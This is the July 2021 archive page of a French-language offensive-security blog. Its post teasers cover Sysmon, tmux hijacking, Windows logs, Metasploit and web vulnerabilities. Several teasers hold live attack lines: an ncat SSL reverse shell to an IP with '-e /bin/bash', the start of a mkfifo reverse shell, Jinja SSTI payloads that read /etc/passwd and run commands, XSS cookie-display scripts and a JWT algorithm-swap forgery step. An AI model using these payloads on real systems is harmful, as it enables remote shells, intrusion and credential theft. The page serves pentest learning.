Sécuriser votre site

Connaître son ennemi
Menu
  • Active Directory
  • Aide-mémoire
  • Antivirus
  • Apparmor
  • Backdoor
  • Enfants
  • Engin de recherche
  • Énumération
  • Exploit
  • Liens
  • Linux
  • Non classé
  • OSINT
  • Powershell
  • Python
  • Ruby
  • Shells
  • Transfert de fichiers
  • Utilitaire
  • Virus
    • Analyse
    • VM
  • Windows
  • Windows Server

Mois : juillet 2021

Sysmon

Sysmon

L’utilitaire sysmon qui fait partie de sysinternals est un driver qui permet de monitorer un système. Cela permet d’avoir une vue détaillée des événements critiques qui se produisent lors d’intrusions dans une machine : création de processus, connexions réseau et changement à la date de création …
Full Article
Pas de commentaire
TMUX session hijacking

TMUX session hijacking

Installation de tmux sudo apt-et install tmux #installation de tmux sous Ubuntu tmux -V #déterminer la version Les sessions tmux #crée une nouvelle session tmux new -s openvpn #crée une esssion avec le nom openvpn La barre verte en bas de l’écran indique que nous sommes …
Full Article
Pas de commentaire
Logs de Windows

Logs de Windows

Les logs de Windows peuvent être accédés de diverses façons Event Viewer (GUI-based application : eventvwr.msc). Observateur d’événements Wevtutil.exe (command-line tool) Get-WinEvent (PowerShell cmdlet) Liste les journaux des événements wevtutil el Lit les événements à partir d’un journal wevtutil qe Application /c:3 /rd:true /f:text   PowerShell cmdlet …
Full Article
Pas de commentaire
Reverse shell encrypté

Reverse shell encrypté

Netcat (nc) ne supporte l’encryption et cela permet d’être détecté facilement (firewall intelligent). Voici donc quelques façons d’améliorer la confidentialité des communications ncat apt install ncat ncat -l 443 --ssl -v ncat 10.9.0.24 --ssl -e /bin/bash -v cryptcat cryptcat -lvp 4444 -k mysecretkey rm /tmp/f;mkfifo /tmp/f;cat …
Full Article
Pas de commentaire
Quelques commandes de metasploit

Quelques commandes de metasploit

Metasploit est une plateforme complète pour l’exploitation de cibles fonctionnant sur une multitude de plateformes. Tout le monde le sait. Mais metasploit peut faire beaucoup plus. Création de rapports de vulnérabilités Recherche de vulnérabilités dans un service spécifique dans un réseau entier Création d’espace de travail(workspace) …
Full Article
Pas de commentaire
Vulnérabilité dans les tokens JWT

Vulnérabilité dans les tokens JWT

Structure d’un token header.payload.secret Les sections sont encodés en base64 Structure d’un header {“typ”:”JWT”,”alg”:”RS256″} Si on a la clé publique du serveur, on peut réencoder le token -Changer l’algorithme dans le header par HS256 (HS256 est symétrique, rs256 est asymétrique) cat a.pem | xxd – p …
Full Article
Pas de commentaire
CSRF exploitation

CSRF exploitation

pip3 install xsrfprobe xsrfprobe -u http://server/endpoint Vulnérabilité CSRF un fichier sur un serveur tiers, lorsque visité par une victime, permet l’exécution de code sur le serveur vulnérable (avec les droits de la victime) URL d’un image (invisible pour la victime) qui exécute du code sur un …
Full Article
Pas de commentaire
Vulnérabilité SSTI

Vulnérabilité SSTI

SSTI (Server Side Template Injection) Pour Flask, on peut vérifier avec {{2+2}} Avec un résultat positif (4), on sait que le serveur est vulnérable. On peut essayer de lire des fichiers avec ce payload {{ ''.__class__.__mro__.__subclasses__()('/etc/passwd').read() }} ou d’exécuter du code {{config.__class__.__init__.__globals__.popen(<command>).read()}} Pour une liste de …
Full Article
Pas de commentaire
Vulnérabilité SSRF

Vulnérabilité SSRF

SSRF (Server Side request forgery) Par exemple, vous pouvez vous connecter à un site web qui utilise des bases de données comme elasticsearch ou mysql sur leur réseau local, mais vous ne pouvez y accéder directement. Si vous pouvez exécuter un script sur le serveur qui …
Full Article
Pas de commentaire
Exploiter les vulnérabilités XSS

Exploiter les vulnérabilités XSS

Vérifier si un site est vulnérable à une faille XSS (réflexion). On entre ce code dans une boîte de recherche. Si rien n’est filtré, souvent, dans le résultat de recherche, les termes recherchés sont affichés. <script>alert("Hello")</script> <script>alert(window.location.hostname)</script> #alternative Afficher le cookie du site <script>alert(document.cookie)</script> Voler un …
Full Article
Pas de commentaire

Navigation des articles

1 2 3 4 … 6 Next

Articles populaires

blogs chercher de façon différente code Enfants engin de recherche engins de recherche entreprises fils de discussion flare forums inetsim InfluxDB installation IOT' internet des objets kids meta médias sociaux OSINT pays personnes programmation recherche REMnux semblable site sock puppet xclip

  • Active Directory
  • Aide-mémoire
  • Analyse
  • Antivirus
  • Apparmor
  • Backdoor
  • Enfants
  • Engin de recherche
  • Énumération
  • Exploit
  • Liens
  • Linux
  • Non classé
  • OSINT
  • Powershell
  • Python
  • Ruby
  • Shells
  • Transfert de fichiers
  • Utilitaire
  • Virus
  • VM
  • Windows
  • Windows Server

Articles récents

  • L’importance de la sécurité informatique dans une petite entreprise
  • L’importance d’embaucher un spécialiste de la sécurité informatique
  • L’importance de la sécurité informatique dans une petite et moyenne entreprise
  • Activation des journaux (logs) de Windows pour la détection de virus en mémoire
  • Engin de recherche pour le contenu sur telegram

Archives

  • février 2023
  • novembre 2022
  • juillet 2022
  • avril 2022
  • mars 2022
  • septembre 2021
  • août 2021
  • juillet 2021
  • juin 2021
  • mai 2021

Sécuriser votre site

Connaître son ennemi
Copyright © 2023 Sécuriser votre site
Article par

Ad Blocker Detected

Our website is made possible by displaying online advertisements to our visitors. Please consider supporting us by disabling your ad blocker.

Refresh
Gérer le consentement aux témoins
Nous utilisons des technologies telles que les témoins pour stocker et/ou accéder aux informations relatives aux appareils. Nous le faisons pour améliorer l’expérience de navigation et pour afficher des publicités personnalisées. Consentir à ces technologies nous permettra de traiter des données telles que le comportement de navigation ou les identifiants uniques sur ce site. Le fait de ne pas consentir ou de retirer son consentement peut avoir un effet négatif sur certaines fonctionnalités et caractéristiques.
Fonctionnel Toujours activé
Le stockage ou l’accès technique est strictement nécessaire dans la finalité d’intérêt légitime de permettre l’utilisation d’un service spécifique explicitement demandé par l’abonné ou l’utilisateur, ou dans le seul but d’effectuer la transmission d’une communication sur un réseau de communications électroniques.
Préférences
Le stockage ou l’accès technique est nécessaire dans la finalité d’intérêt légitime de stocker des préférences qui ne sont pas demandées par l’abonné ou l’utilisateur.
Statistiques
Le stockage ou l’accès technique qui est utilisé exclusivement à des fins statistiques. Le stockage ou l’accès technique qui est utilisé exclusivement dans des finalités statistiques anonymes. En l’absence d’une assignation à comparaître, d’une conformité volontaire de la part de votre fournisseur d’accès à internet ou d’enregistrements supplémentaires provenant d’une tierce partie, les informations stockées ou extraites à cette seule fin ne peuvent généralement pas être utilisées pour vous identifier.
Marketing
Le stockage ou l’accès technique est nécessaire pour créer des profils d’utilisateurs afin d’envoyer des publicités, ou pour suivre l’utilisateur sur un site web ou sur plusieurs sites web ayant des finalités marketing similaires.
Gérer les options Gérer les services Gérer les fournisseurs En savoir plus sur ces finalités
Voir les préférences
{title} {title} {title}